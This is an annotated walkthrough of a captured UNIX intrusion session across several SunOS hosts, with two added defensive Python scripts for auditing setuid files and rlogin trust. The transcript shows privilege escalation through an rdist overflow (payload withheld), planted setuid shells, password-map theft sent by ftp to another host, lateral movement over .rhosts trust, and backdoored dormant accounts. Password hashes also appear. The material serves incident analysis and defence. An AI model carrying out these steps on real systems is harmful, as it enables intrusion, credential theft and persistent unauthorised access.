What the Hacker Was Doing

Line #1

When this hacker broke into the system in December, he used a guest account set up without a password. After he broke in, he assigned his own password to the guest account and to the account called "ingres," so he would have easy login access next time around.

Line #2

The "who" command checks to see whether anyone else is logged on. Our friend doesn't want anyone on the system to notice him.

Line #5

This line copies a communications program called "kermit" to the hacker's current working directory. Then he can use kermit to transfer the security tools that he will use to gain access to systems and data. Note that most hackers transfer their own security tools to simplify their work. Some hackers know little to nothing about operating systems; they just employ tools written by people who do.

Lines #6 to 25

Now the hacker is exploiting a known bug to gain root access to the system. (The hacker writes some code to overflow a buffer in rdist and then sends commands to rdist that get executed.) If the system had been properly patched, this wouldn't be possible!

  1 valley% sh
  2 $ who
  3 ingres   ttyp0   Jan 18 23:02
  4 root     ttyp2   Jan 15 18:38   (canyon)
  5 $ cp /home2/jeff/bin/kermit.orig kermit
  6 $ kermit
  7 C-Kermit 5A(178) ALPHA, 29 Jan 92, SUNOS 4.1 (BSD)
  8 Type ? or HELP for help
  9 C-Kermit>rece fi
 10 Escape back to your local Kermit and give a SEND command...
 11 # N3
 12 0 Yz* @-#Y1~N! y-
 13 %!YfiO
 14 #"Y@
 15 ##YA
 16 #$YB
 17 #%YC
 18 #&YD
 19 C-Kermit>
 20 Stopped
 21 valley% sh
 22 Stopped (signal)
 23 valley% sh
 24 overflows buffer here (removed for security)
 25 $ /tmp/sh

Lines #26 to 27

The hacker now has root access. He's in! He sets the mode and permissions and changes the name to something he's not likely to forget. Notice that he removes the /tmp/sh file, since he doesn't want to leave any evidence of his visit.

Line #28

He misspells a command.

Lines #29 to 45

He issues the ls (list) command with -t (time) specified to obtain a directory listing with the newest files listed first. The files are listed.

Lines #46 to 48

Just checking again to make sure he doesn't have company. Most hackers continue to check the system for other logins for the duration of their attacks.

Line #49

Here he pipes the output of the last command through grep to find the string "est". (The -i option tells UNIX that either upper- or lowercase characters are OK.) Presumably, the hacker's looking for logins from the DNS domain of ".West". (If you're not familiar with UNIX, "grep" is a common command that stands for Grab Regular ExPression. Basically, you can use grep to search for any occurrences of a specified string within files on a system.)

 26 # rm /tmp/sh
 27 rm: override protection 755 for /tmp/sh? y
 28 # lsll
 29 # ls -tal
 30 total 1049
 31 drwxr-xr-x  4 ingres        512 Jan 18 23:04 .
 32 -rwsrwsrwx  1 root        24576 Jan 18 23:04 suck
 33 -rw-r--r--  1 root           61 Jan 18 23:04 c.c
 34 -rwxr-xr-x  1 ingres     442368 Jan 18 23:03 kermit
 35 -rwxrwxrwx  1 ingres     360448 Jan 16 11:02 testit
 36 drwxr-xr-x 30 root         1024 Dec 18 20:27 ..
 37 -rw-r--r--  1 ingres       1148 Jun  9  1992 foo
 38 drwxrwsrwx  6 ingres       6144 Aug 23  1991 SERVICE
 39 -rwxr-xr-x  1 ingres     106496 Feb 25  1991 sun4_lookup
 40 -rwxr-xr-x  1 ingres      98304 Feb 25  1991 sun3_lookup
 41 drwxr-xr-x  3 ingres        512 Jan 23  1991 quoter
 42 -rw-r--r--  1 ingres        306 Nov 20  1987 .cshrc
 43 -rw-r--r--  1 ingres       1159 Nov 20  1987 .install
 44 -r--r--r--  1 ingres         20 Nov 20  1987 .version
 45 -rw-r--r--  1 ingres         36 Jan 26  1987 .oemstring
 46 # who
 47 ingres   ttyp0   Jan 18 23:02
 48 root     ttyp2   Jan 15 18:38   (canyon)
 49 # last | grep -i est

Lines #50 to 57

Now he's looking for someone specific, "lorin." Apparently, "lorin" hasn't logged in since the last time the hacker broke in and deleted the log files (on January 16). He tries to grep for "lorin" in /etc/passwd, but mistypes the file name. Then he remembers that the user name he's thinking of is "lorimo," not "lorin." Obviously, this guy's been here before.

Lines #58 to 61

The intruder re-edits his C program with ed, changing the setuid(0) call to setuid(21477). The new setting allows him to switch user to "lorimo."

Lines #62 to 66

More typos. This guy could use a good typing tutor.

Lines #67 to 75

Here the hacker compiles a new version of his exploit code and renames the result (a.out) to another name he will not forget (he's got a great vocabulary). By running two of his setuid programs in turn (first the root one, then the new one), he changes his user ID.

 50 # last lorin
 51 wtmp begins Sat Jan 16 11:37
 52 # grep lor /etc/passwwd
 53 grep: /etc/passwwd: No such file or directory
 54 # grep lor /etc/passwd
 55 # ypcat passwd | grep lor
 56 lori:N.4Pgz4iUS8kk:5734:50:Lori:/home/lori:/bin/csh
 57 lorimo:xxYTF8y3fSqGo:21477:50:Lori:/home/lorimo:/bin/csh
 58 # ed c.c
 59 /uid/
 60 setuid(0);
 61 setuid(21477);
 62 # cc .cc
 63 cc: Warning: File with unknown suffix (.cc) passed to ld
 64 ld: .cc: No such file or directory
 65 # cc `c
 66 > ^C
 67 # cc c.c
 68 # mv a.out shit
 69 # chmod 6777 shit
 70 # ./suck
 71 # id
 72 uid=0(root) gid=0(wheel) groups=7
 73 # ./shit
 74 $ id
 75 uid=21477(lorimo) gid=0(wheel) groups=7
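The setuid wrapper the intruder builds above (a tiny C program that calls setuid(), compiled and given mode 6777) leaves a distinctive trace in any ls -l listing: a root-owned, set-id, world-writable regular file sitting in /tmp or a home directory. The Python script below is an added example, not code from the book; it parses ls -l output and flags such files. The listing lines are constructed in the transcript's format, and the list of directories where setuid-root binaries are expected is an assumption to adjust per host.

```python
"""Find setuid/setgid files that look like a planted root shell: root-owned,
set-id, often world-writable (chmod 6777), dropped in /tmp or a home directory.
Added example, not from the book; sample listing lines are constructed."""
import re
from typing import Dict, List, NamedTuple

# Assumption: where setuid-root binaries legitimately live on this host.
EXPECTED_SUID_DIRS = ("/bin", "/usr/bin", "/usr/ucb", "/usr/etc", "/usr/lib")

# mode, link count, owner, optional group, size, date (two layouts), name.
LS_LINE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?:\S+\s+)?"
    r"(?P<size>\d+)\s+\w{3}\s+\d+\s+[\d:]+\s+(?P<name>\S.*)$"
)


class Entry(NamedTuple):
    path: str
    mode: str
    owner: str


def parse_listing(directory: str, lines: List[str]) -> List[Entry]:
    """Turn `ls -l <directory>` output into entries; 'total' and noise are skipped."""
    entries = []
    for line in lines:
        m = LS_LINE.match(line.strip())
        if m:
            entries.append(Entry(directory.rstrip("/") + "/" + m["name"], m["mode"], m["owner"]))
    return entries


def audit_suid(entries: List[Entry]) -> Dict[str, List[str]]:
    """{path: [reasons]} for regular files with a set-id bit that merit a look."""
    findings: Dict[str, List[str]] = {}
    for e in entries:
        if e.mode[0] != "-":
            continue  # setgid directories are normal; only regular files matter here
        setuid, setgid = e.mode[3] in "sS", e.mode[6] in "sS"
        if not (setuid or setgid):
            continue
        reasons = []
        expected = any(e.path.startswith(d + "/") for d in EXPECTED_SUID_DIRS)
        if setuid and e.owner == "root" and not expected:
            reasons.append("setuid root outside the system directories")
        if e.mode[8] == "w":
            reasons.append("world-writable: anyone can replace the privileged code")
        if "S" in (e.mode[3], e.mode[6]):
            reasons.append("set-id bit without execute bit (odd mode)")
        if reasons:
            findings[e.path] = reasons
    return findings


# Constructed listings in the format of the transcript's `ls -tal` output.
SAMPLE = {
    "/tmp": [
        "total 2415",
        "drwxrwsrwx  3 bin          1024 Jan 18 23:12 .",
        "-rwsrwsrwx  1 root        24576 Jan 18 23:11 a.out",
        "-rwxr-xr-x  1 cmeyer         41 Jan 13 12:31 junk",
    ],
    "/home/se/wendy": ["-rwsrwsrwx  1 root        24576 Jan 18 23:13 a.out"],
    "/usr/bin": ["-rwsr-xr-x  1 root        24576 Oct 24  1992 passwd"],
}


def run_audit(sample: Dict[str, List[str]] = SAMPLE) -> Dict[str, List[str]]:
    entries = [e for d, lines in sample.items() for e in parse_listing(d, lines)]
    return audit_suid(entries)


if __name__ == "__main__":
    for path, reasons in run_audit().items():
        print(path, "->", "; ".join(reasons))
```

On a live host, feed it the output of `ls -l` over /tmp and the home directories (or a `find / -perm -4000` sweep) and compare the findings against a baseline taken before the incident.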

Lines #76 to 88

Now he's looking for new places to go by issuing rlogin commands to other systems on which lorimo might be trusted (.rhosts files and /etc/hosts.equiv are used to set up trust between systems). If lorimo is trusted on other systems, the hacker will be granted access to those systems without having to enter a password. This is called "door rattling." If he is successful, it will give him access to more information and new places to launch attacks from in the future.

Line #89

The hacker changes his identity back to the superuser (root).

Lines #90 to 92

He looks over his shoulder again (hence the "who" command), then double-checks that he's got the user ID information correct.

Lines #93 to 94

The hacker looks for lorimo in the NIS password map.

Line #95

The hacker changes to the directory /home.

 76 $ rlogin tsunami
 77 Password:
 78 Login incorrect
 79 Login incorrect
 80 login: ^D
 81 Connection closed.
 82 $ rlogjn suntzu
 83 rlogjn: not found
 84 $ rlogin suntzu
 85 Password:
 86 Login incorrect
 87 login: ^D
 88 Connection closed.
 89 $ ^D
 90 # who
 91 ingres   ttyp0   Jan 18 23:02
 92 root     ttyp2   Jan 15 18:38   (canyon)
 93 # ypcat passwd | grep lorimo
 94 lorimo:xxYTF8y3fSqGo:21477:50:Lori :/home/lorimo:/bin/csh
 95 # cd /home

Line #96

The hacker starts a background job to search /home for .rhosts files. The logic behind this search is that some people who use .rhosts files (for trust) may have entries on several machines around the network. While this job is running, he moves on.

Lines #97 to 98

More hacker typos.

Lines #99 to 100

Our friend has had enough of being lorimo. He checks the password file for jeff. He decides to impersonate jeff. First, however, he must edit his code.

Lines #101 to 113

He tries to edit his code, but he is in the wrong directory. He switches to the right directory, edits the code (setuid(21477) becomes setuid(13147)), runs it, and becomes the user jeff.

Lines #114 to 119

Becoming jeff was a good choice. The hacker logs into a new system (tsunami) without even needing a password. (This is an excellent example of how having one system trust another can be very dangerous.)

 96 # find . -name .rhosts -print &
 97 # gupr
 98 # grep^C
 99 # ypcat passwd | grep jeff
100 jeff:wW/q0t03L6xO.:13147:50:Jeff :/home/jeff:/bin/csh
101 # ed c.c
102 ?c.c: No such file or directory
103 # cd
104 # ed c.c
105 /uid/
106 setuid(21477);
107 setuid(13147);
108 # cc c.c
109 # mv a.out shit
110 # chmod 6777 shit
111 # ./shit
112 $ id
113 uid=13147(jeff) gid=0(wheel) groups=7
114 $ rlogj tsunami
115 rlogj: not found
116 $ rlogin tsunami
117 No directory!  Logging in with home=/
118 SunOS Release 4.1.2 (TSUNAMI) #3: Sat Oct 24 07:56:45 PDT 1992
119 You have new mail.
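The passwordless rlogin above, and the "door rattling" described for lines 76 to 88, are what .rhosts and hosts.equiv trust buys an intruder: each trusted account is a hop to the next host. The Python model below is an added example, not code from the book; it reads trust entries as a graph and computes every account a single compromised login can reach without a password, so an administrator can see the blast radius before an intruder does. The hosts, accounts and trust lines are constructed to mirror the valley, tsunami and suntzu chain in the transcript; the semantics are the standard rlogin ones (hosts.equiv never applies to root, a missing user in .rhosts means the same user name, "+" matches anything).

```python
"""Model rlogin trust (hosts.equiv and per-account .rhosts) as a graph and
compute how far one compromised account can hop with no password.
Added example, not from the book; all data below is constructed."""
from typing import Dict, List, Set, Tuple

Account = Tuple[str, str]  # (host, user)

# hosts.equiv on each host: every same-named non-root user on a listed host
# gets a passwordless login. (Constructed.)
HOSTS_EQUIV: Dict[str, List[str]] = {
    "valley": [],
    "tsunami": ["valley"],
    "suntzu": ["tsunami"],
}
# ~user/.rhosts on each host: "<remote-host> [<remote-user>]", "+" = any,
# a missing user means "same name as the local account". (Constructed.)
RHOSTS: Dict[Account, List[str]] = {
    ("suntzu", "wendy"): ["tsunami jeff"],
    ("valley", "root"): ["+"],  # root from any host: the worst case
}
# Accounts present on each host (the transcript's sites share them via NIS).
ACCOUNTS: Dict[str, List[str]] = {
    "valley": ["root", "ingres", "jeff", "lorimo"],
    "tsunami": ["root", "jeff", "wendy"],
    "suntzu": ["root", "jeff", "wendy", "lori"],
}


def rhosts_grants(entry: str, local_user: str, remote: Account) -> bool:
    """Does one .rhosts line for local_user admit the remote (host, user)?"""
    fields = entry.split()
    if not fields or fields[0].startswith("#"):
        return False
    rhost = fields[0]
    ruser = fields[1] if len(fields) > 1 else local_user
    if rhost.startswith("-") or ruser.startswith("-"):
        return False  # '-' entries deny; treated simply as no grant here (no netgroups)
    return rhost in ("+", remote[0]) and ruser in ("+", remote[1])


def reachable(start: Account) -> Set[Account]:
    """All accounts an intruder holding `start` can rlogin into, transitively."""
    seen: Set[Account] = {start}
    frontier = [start]
    while frontier:
        host, user = frontier.pop()
        targets: Set[Account] = set()
        if user != "root":  # hosts.equiv never applies to root
            for h2, equiv in HOSTS_EQUIV.items():
                if host in equiv and user in ACCOUNTS.get(h2, []):
                    targets.add((h2, user))
        for (h2, u2), entries in RHOSTS.items():
            if any(rhosts_grants(e, u2, (host, user)) for e in entries):
                targets.add((h2, u2))
        for t in targets - seen:
            seen.add(t)
            frontier.append(t)
    return seen


def wildcard_entries() -> List[Tuple[Account, str]]:
    """.rhosts lines that trust any host or any user; fix these first."""
    return [(acct, e) for acct, es in RHOSTS.items() for e in es if "+" in e.split()]


if __name__ == "__main__":
    for h, u in sorted(reachable(("valley", "jeff"))):
        print("jeff@valley reaches %s@%s" % (u, h))
    print("wildcard entries:", wildcard_entries())
```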

Lines #120 to 126

The hacker (who is now the user jeff) sets his shell to sh to foil any csh .history logs. (The hacker is being careful not to leave evidence of his commands behind.) Then he checks to see who else is logged onto the system.

Lines #127 to 136

The hacker tries to copy the NIS password map into the current directory and gets "Permission denied," because he cannot write there. He checks who he is logged in as (he must have forgotten) and sees that he is jeff. Since jeff cannot write files to that directory, the hacker changes to /tmp, where any user can create files.

Lines #137 to 141

He's stretching his wings a bit here, looking for password maps to copy and explore. (He copies the NIS password file to a file called "aaa".) Hackers often copy password files in order to subject them to password crackers and obtain more passwords. The more passwords a hacker has, the better his odds of raiding other systems.

120 tsunami% ^C
121 tsunami% sh
122 $ who
123 wendy    ttyp2   Jan  6 13:55   (arawana)
124 derek    ttyp3   Jan 13 17:57   (lajolla)
125 derek    ttyp4   Jan 15 13:11   (lajolla)
126 jeff     ttyp5   Jan 18 23:09   (valley)
127 $ cat /etc/passwd^C
128 $ ypcaty^C
129 $ ypcat passwd > suna
130 suna: Permission denied
131 $ id
132 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff)
133 $ pwd
134 $ cd
135 $ pwd
136 $ cd /tmp
137 $ ypcat passwd > aaa
138 $ ls -tal aa
139 aa not found
140 $ ls -tal aaa
141 -rw-r--r--  1 jeff        15382 Jan 18 23:09 aaa

Lines #142 to 162

Now he starts an ftp session back to the original host (valley) as user ingres. In that session, he copies the password file to the system valley. In the same session, he copies his security tools from valley to tsunami.

Lines #163 to 173

Once again, he re-creates his small C program (again omitted for security reasons) to exploit a security bug to obtain superuser access (root). He now has full control (root access) of system tsunami.

142 $ ftp valley
143 Connected to valley
144 220 valley FTP server (SunOS 4.1) ready.
145 Name (valley:jeff): ingres
146 331 Password required for ingres.
147 Password:
148 230 User ingres logged in.
149 ftp> send aaa
150 200 PORT command successful.
151 150 ASCII data connection for aaa
152 226 ASCII Transfer complete.
153 local: aaa remote: aaa
154 15578 bytes sent in 0.063 seconds (2.4e+02 Kbytes/s)
155 ftp> get foo
156 200 PORT command successful.
157 150 ASCII data connection for foo
158 226 ASCII Transfer complete.
159 local: foo remote: foo
160 1155 bytes received in 0.11 seconds (9.9 Kbytes/s)
161 ftp> quit
162 221 Goodbye.
163 $ cat foo | /usr/ucb/rdist -Server localhost
164 $ /tmp/sh
165 # rm foo
166 # rm /tmp/sh
167 rm: override protection 755 for /tmp/sh? y
168 # ed c.c
169 # cc c.c
170 # chmod 6777 a.out
171 # ./a.out
172 # id
173 uid=0(root) gid=0(wheel) groups=50(lastaff)

Lines #174 to 182

The hacker looks to see if there are any password.old entries or other changes to the /etc/passwd file. The hacker also tries to change jeff's NIS password without success.

Lines #183 to 197

This time, he lists the contents of the /etc/passwd file.

174 # ls -tal /etc/*ass*
175 -rw-r--r--  1 root          634 Dec  7 12:31 /etc/passwd
176 # cat /etc/}4^U
177 passwd
178 cat: /etc/}4: No such file or directory
179 Changing NIS password for jeff on suntzu.
180 Old password:
181 New password:
182 Password unchanged.
183 # cat /etc/passwd
184 root:R7QCfnYR4gvzU:0:1:Operator:/:/bin/csh
185 nobody:*:65534:65534::/:
186 daemon:*:1:1::/:
187 sys:*:2:2::/:/bin/csh
188 bin:*:3:3::/bin:
189 uucp:*:4:8::/var/spool/uucppublic:
190 news:*:6:6::/var/spool/news:/bin/csh
191 ingres:*:7:7::/usr/ingres:/bin/csh
192 audit:*:9:9::/etc/security/audit:/bin/csh
193 sync::1:1::/:/bin/sync
194 sysdiag:*:0:1:Old System Diag:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
    sundiag:*:0:1:System Diag:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
195 operator:lNtDk7crIdKh2:5:5:Account forbackups:/usr/backup:/bin/csh
196 lc:u0gFO1zE9Yx9U:27:50:LC Calendar:/var/lc:/bin/csh
197 +::0:0:::

Lines #198 to 209

The hacker changes his user ID from superuser back to jeff. Then, he rechecks his user ID and proceeds to rename his a.out to a name he won't forget (just like before). Again, he runs an ls -t command to list the newest files first.

Lines #210 to 212

He removes his local copy of the NIS password file ("aaa"). He's already copied the file back to host valley, so he doesn't need it here. Then, he removes his exploit code and is ready to move on.

Lines #213 to 227

The hacker checks to see which filesystems are mounted.

198 # ^D
199 # id
200 uid=4401(jeff) gid=50(lastaff) euid=0(root) groups=50(lastaff)
201 # mc^C
202 # mv .^C
203 # mv a.out shit
204 # ls -tal
205 total 2415
206 drwxrwsrwx  3 bin          1024 Jan 18 23:12 .
207 -rwsrwsrwx  1 root        24576 Jan 18 23:11 shit
208 -rw-r--r--  1 root           61 Jan 18 23:11 c.c
209 -rw-r--r--  1 jeff        15382 Jan 18 23:09 aaa
210 # rm aaa
211 # rm c.c
212 rm: override protection 644 for c.c? y
213 # df
214 Filesystem     kbytes    used    avail capacity  Mounted on
215 /dev/sd0a       10483    5081     4354    54%    /
216 /dev/sd0g       96943   78335     8914    90%    /usr
217 /dev/sd0e       22927    3111    17524    15%    /var
218 /dev/sd1h     1255494 1081249    48696    96%    /home
219 /dev/sd3h     1255494 1030386    99559    91%    /home/se
220 la:/usr/local 2097151 1154033   692365    63%    /usr/local
221 suntzu:/var/spool/mail
222                445852  334295    66972    83%    /var/spool/mail
223 mfp:/home/sybase 318991 244337    42755    85%    /home/sybase
224 app1:/export/sun/sun4/openwin-3.0
225                189858  131073    39799    77%    /usr/openwin
226 app1:/export/apps 1255494 771887  358057   68%    /export/apps
227 app1:/export/apps 1255494 771887  358057   68%    /usr/local

Lines #228 to 229

More typos or possible line noise.

Lines #230 to 258

The hacker looks for user home directories, finds wendy's home directory, and becomes user wendy. That's short-lived, because for some reason the hacker decides to look for the user dan. Presumably, the hacker already knows that dan exists.

228 # irG~cd /home/se
229 irG~cd: not found
230 # cd /home/se
231 # ls
232 cmeyer      hamant      lost+found  mikec       wendy
233 colleen     joseph      mark        mikep
234 derek       kevin       matthews    neally
235 # cd wendy
236 # cp /tmp/shit .
237 # ls -tal shit
238 -rwxr-xr-x  1 root        24576 Jan 18 23:13 shit
239 # chmod 6777 shit
240 # ls -tal shit
241 -rwsrwsrwx  1 root        24576 Jan 18 23:13 shit
242 # pwd
243 /home/se/wendy
244 # cd /tmp
245 # ls -tal | more
246 total 2398
247 drwxrwsrwx  3 bin          1024 Jan 18 23:13 .
248 -rwsrwsrwx  1 root        24576 Jan 18 23:11 shit
249 -rwxr-xr-x  1 cmeyer         41 Jan 13 12:31 junk
250 -rw-r--r--  1 cmeyer         12 Jan 13 12:05 junk.dat
251 -rw-r--r--  1 derek           0 Jan 12 16:07 6310
252 (16 lines of output were deleted and the hacker becomes the user wendy)
253 hacker typos
254 # rm shit
255 # grep dan/etc/passwd
256 # ypcat passwd | grep dan
257 danf:*:13602:50::/home/guest/danf:/bin/csh
258 dan:*H.6HaoIt2xDu2:13601:50:& :/home/guest/dan:/bin/csh

Lines #259 to 263

More nervous glances (with "who").

Lines #264 to 273

He goes back to being jeff. Apparently, the real jeff gets around quite a bit since the hacker now logs onto suntzu as jeff. Again, no password is required.

Line #274

Another shell change to avoid leaving his mark in the history logs.

Lines #275 to 281

The hacker checks to make sure that /home/se is mounted from host tsunami. (If you remember, /home/se/wendy is where he left his exploit code. He'll need that to gain root access to this new host.)

259 # who
260 wendy    ttyp2   Jan  6 13:55   (arawana)
261 derek    ttyp3   Jan 13 17:57   (lajolla)
262 derek    ttyp4   Jan 15 13:11   (lajolla)
263 jeff     ttyp5   Jan 18 23:09   (valley)
264 # ^D
265 $ id
266 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff)
267 $ rlogin suntzu
268 Last login: Thu Jan 14 06:35:30 on ttyh1
269 SunOS Release 4.1.2 (SUNTZU.X) #2: Fri Oct 23 22:25:48 PDT 1992
270 You have new mail.
271 suntzu% who
272 jeff     ttyp0   Jan 18 23:14
273 (tsunami)
274 suntzu% sh
275 $ df
276 Filesystem          kbytes     used   avail capacity  Mounted on
277 /dev/sd6a            14983    11056    2429    82%    /
278 /dev/sd6g            91998    76365    6434    92%    /usr
279 /dev/sd6h           445852   334297   66970    83%    /var
280 /dev/sd4c          1255494  1030410   99535    91%    /home/se
281 tsunami:/home/se   1255494  1030410   99535    91%    /tmp_mnt/home/se

Lines #282 to 287

The hacker uses his exploit code and gains root access on the system suntzu. This makes three systems he's compromised so far.

Lines #288 to 292

He is looking for passwords again. (Is this starting to seem familiar?)

Lines #293 to 317

The hacker changes to the guest home directory and lists its contents. He notices a file called test in dan's home directory.

Line #318

I've removed several lines to protect confidentiality.

282 $ cd /home/se/wendy
283 $ ls -tal shit
284 -rwsrwsrwx  1 root  24576 Jan 18 23:13 shit
285 $ ./shit
286 # id
287 uid=0(root) gid=0(wheel) groups=50(lastaff)
288 # ls -tal /etc/*ass*
289 -rw-r--r--  1 root  15465 Jan 15 14:29 /etc/passwd
290 -rw-r--r--  1 root  15462 Dec 28 17:58 /etc/passwd.OLD
291 -rw-r--r--  1 root  15514 Nov 12 18:58 /etc/passwd.old
292 -rw-r--r--  1 root  15215 Sep  9 10:02 /etc/passwd~
293 # cd /home/guests
294 /home/guests: bad directory
295 # cd /home/guest
296 # ls -tal
297 total 56
298 dr-xr-xr-x 10 root          512 Jan 18 23:15 ..
299 drwxr-xr-x  9 guest1       1024 Jan 15 16:21 guest1
300 drwxr-xr-x 11 mary         1536 Jan 14 17:37 mary
301 drwxr-xr-x  5 jeffs         512 Jan 12 15:57 jeffs
302 drwxr-xr-x  3 eddie         512 Jan  8 13:04 eddie
303 drwxr-xr-x  3 sunwise       512 Jan  8 09:36 sunwise
304 drwxrwxrwx  3 brad          512 Jan  6 15:43 dan
305 # ls -tsl dan
306 total 1450
307   1 -rw-r--r--  1 65534      34 Jan  6 15:43 test
308 264 -rw-r--r--  1 dan    255563 Jul  8  1992 packet.dat
309  56 -rwxr-xr-x  3 dan     57344 Jul  1  1992 sz
310  56 -rwxr-xr-x  3 dan     57344 Jul  1  1992 sx
311  56 -rwxr-xr-x  3 dan     57344 Jul  1  1992 sb
312  40 -rwxr-xr-x  3 dan     40960 Jul  1  1992 rx
313  40 -rwxr-xr-x  3 dan     40960 Jul  1  1992 rb
314  40 -rwxr-xr-x  3 dan     40960 Jul  1  1992 rz
315 896 -rw-rw-rw-  1 dan    901682 Jun 16  1992 junk.2
316   1 drwxr-xr-x  2 dan       512 Oct 25  1990 doswin
317 # cat dan/test
318 code removed for security reasons

Line #319

Now the hacker's looking for the person with UID 65534. This turns out to be the user ID for "nobody."

Lines #320 to 393

Here, he's looking for other users on this system. He's particularly interested in user accounts that haven't been used recently, since no one is likely to notice him using such accounts. To find inactive accounts, the hacker looks for directories with no recent file accesses. He also checks the last times that users were logged into the system.

319 # grep 65534 /etc/passwd
320 # cd /home/se
321 # ls -tal
322 total 44
323 dr-xr-xr-x 10 root          512 Jan 18 23:15 ..
324 drwxr-xr-x 17 wendy        2560 Jan 18 23:13 wendy
325 drwxr-xr-x 26 hamant       4608 Jan 18 17:28 hamant
326 drwxr-xr-x 48 neally       9728 Jan 18 11:03 neally
327 drwxr-xr-x 41 derek        3584 Jan 16 03:16 derek
328 drwxr-xr-x 17 kevin        2048 Jan 15 17:04 kevin
329 drwxr-xr-x 31 mark         3072 Jan 15 16:41 mark
330 drwxr-xr-x 19 colleen      1536 Jan 15 16:15 colleen
331 drwxr-xr-x 44 matthews     4608 Jan 15 11:37 matthews
332 drwxr-xr-x 16 mikep        1536 Jan 15 11:24 mikep
333 drwxr-xr-x  2 10406         512 Dec  2 11:35 mikec
334 drwxr-xr-x 24 cmeyer       2048 Dec  1 11:11 cmeyer
335 drwxr-xr-x 15 root          512 Sep 15 17:04 .
336 drwxr-xr-x  8 5542         1536 Aug 28 15:13 joseph
337 drwxr-xr-x  2 root          512 Jul 17  1991 lost+found
338 # last | grep eric
339 ericz     ttyh1        Mon Jan 18 08:30 - 08:32  (00:02)
340 ericz     ttyh1            Aug 30 14:25 - 14:25  (00:00)
341 ericz     ttyh1    ^C
342 # id
343 uid=0(root) gid=0(wheel) groups=50(lastaff)
344 # grep eric /etc/passwd
345 Uace:LEkQ/KdKGcyV2:4:4:ACE:/usr/spool/uucppublic:/usr/lib/uucp/uucico
346 Uaim:93uUCUdUU6zdI:4:4:AIM:/usr/spool/uucppublic:/usr/lib/uucp/uucico
347 ericz:vt0R/k7x2W1kY:3063:50::/home/region3/ericz:/bin/csh
348 ericc:23JjW1a5hqUSQ:4094:10:& :/home/guest/eric:/bin/csh
349 # last ericc
350 ericc     ttyp1    ptero    Mon Aug  3 18:52 - 18:52  (00:00)
351 wtmp begins Wed Jul  1 18:46
352 # last richp
353 richp     ttyp0    awe      Sat Jan 16 19:33 - 19:34  (00:00)
354 richp     ttyp4    vela     Mon Jan 11 15:59 - 16:00  (00:00)
355 richp     ttyp8    vela     Wed Oct  7 13:28 - 13:58  (00:29)
356 richp     ttyh1             Mon Oct  5 15:39 - 15:41  (00:01)
357 richp     ttyh1             Mon Oct  5 14:15 - 14:18  (00:02)
358 richp     ttyh1             Mon Oct  5 13:54 - 13:58  (00:03)
359 richp     ttyp3    vela     Mon Oct  5 09:43 - 09:44  (00:00)
360 richp     ttyh1             Wed Sep 30 17:57 - 17:57  (00:00)
361 richp     ttyp2    vela     Tue Sep 29 14:31 - 14:32  (00:00)
362 richp     ttyh1             Thu Sep 24 13:48 - 13:51  (00:02)
363 richp     ttyp1    valley   Wed Sep 23 19:47 - 19:48  (00:00)
364 richp     ttyh1             Wed Sep 23 13:28 - 13:48  (00:20)
365 richp     ttyh1             Mon Sep 21 11:27 - 11:29  (00:02)
366 richp     ttyp6    vela     Fri Sep  4 09:15 - 09:16  (00:01)
367 richp     ttyp5    vela     Thu Sep  3 12:31 - 13:00  (00:28)
368 richp     ttyp5    vela     Thu Sep  3 12:11 - 12:11  (00:00)
369 richp     ttyp5    vela     Thu Sep  3 11:42 - 11:43  (00:00)
370 richp     ttyp5    vela     Thu Sep  3 10:01 - 10:04  (00:02)
371 wtmp begins Wed Jul  1 18:46
372 # last lwake
373 lwake     ttyp2    runcible Tue Dec  1 15:00 - 15:06  (00:06)
374 lwake     ttyp3    runcible Wed Sep 30 13:01 - 13:15  (00:13)
375 lwake     ttyp2    runcible Tue Sep 22 09:12 - 09:14  (00:02)
376 lwake     ttyp2    runcible Fri Jul 24 14:40 - 14:40  (00:00)
377 lwake     ttyp4    runcible Fri Jul 17 09:13 - 09:14  (00:00)
378 lwake     ttyp4    runcible Fri Jul 17 09:12 - 09:13  (00:00)
379 lwake     ttyp2    runcible Mon Jul 13 16:56 - 17:02  (00:05)
380 wtmp begins Wed Jul  1 18:46
381 # last eggers
382 eggers    ttyp0    sunkist  Thu Jan  7 06:40 - 06:40  (00:00)
383 eggers    ttyh1             Mon Nov 16 16:41 - 16:42  (00:00)
384 eggers    ttyp1    bike     Mon Nov 16 16:37 - 16:41  (00:03)
385 eggers    ttyp1    bike     Thu Nov 12 18:35 - 18:39  (00:03)
386 eggers    ftp      bike     Wed Oct  7 12:58 - 13:03  (00:05)
387 eggers    ttyp8    bike     Wed Oct  7 12:53 - 13:03  (00:10)
388 eggers    ttyp1    bike     Tue Oct  6 14:14 - 15:27  (01:13)
389 eggers    ttyp1    bike     Wed Sep 23 16:25 - 16:30  (00:05)
390 eggers    ttyp1    bike     Tue Sep 15 20:34 - 20:36  (00:01)
391 eggers    ttyh1             Fri Sep 11 18:39 - 18:39  (00:00)
392 eggers    ttyh1             Fri Sep 11 18:11 - 18:21  (00:10)
393 eggers    ttyh1             Fri Sep 11 17:52 - 18:01  (00:08)

Lines #394 to 426

At this point, our friend is getting ready to leave. But first, he sets new passwords on the dormant accounts he's been using. This step will make his next break-in here much easier. (This is why you always need to set new passwords after a break-in!)

Lines #427 to 431

Enough for one day. Our unwanted guest covers his tracks (not shown for security reasons) and logs out.

394 # passwd ericc
395 Changing password for ericc on suntzu.
396 New password:
397 Retype new password:
398 # grep lori /etc/passwd
399 lori:FAJEq1YKw4p7.,0:5734:50:Lori:/home/guest/lori:/bin/csh
400 # pwd
401 /tmp_mnt/home/se/wendy
402 # cd /home/guests
403 /home/guests: bad directory
404 # cd /home/guest
405 # ls -tal lori
406 total 10
407 drwxr-xr-x 52 root         1024 Sep 12 14:25 ..
408 drwxr-xr-x  3 lori          512 Aug  9 18:46 .
409 -rw-r--r--  1 lori         1262 Aug  9 18:46 .l123set,v1.1
410 drwxr-xr-x  2 lori          512 Aug  8 17:45 .dist
411 -rw-r--r--  1 lori         1457 Jun  7  1991 .login
412 -rw-r--r--  1 lori         2687 Jun  7  1991 .cshrc
413 # last lori
414 wtmp begins Wed Jul  1 18:46
415 # passwd ericc
416 Changing password for ericc on suntzu
417 New password:
418 Retype new password:
419 # passwd lori
420 Changing password for lori on suntzu
421 New password:
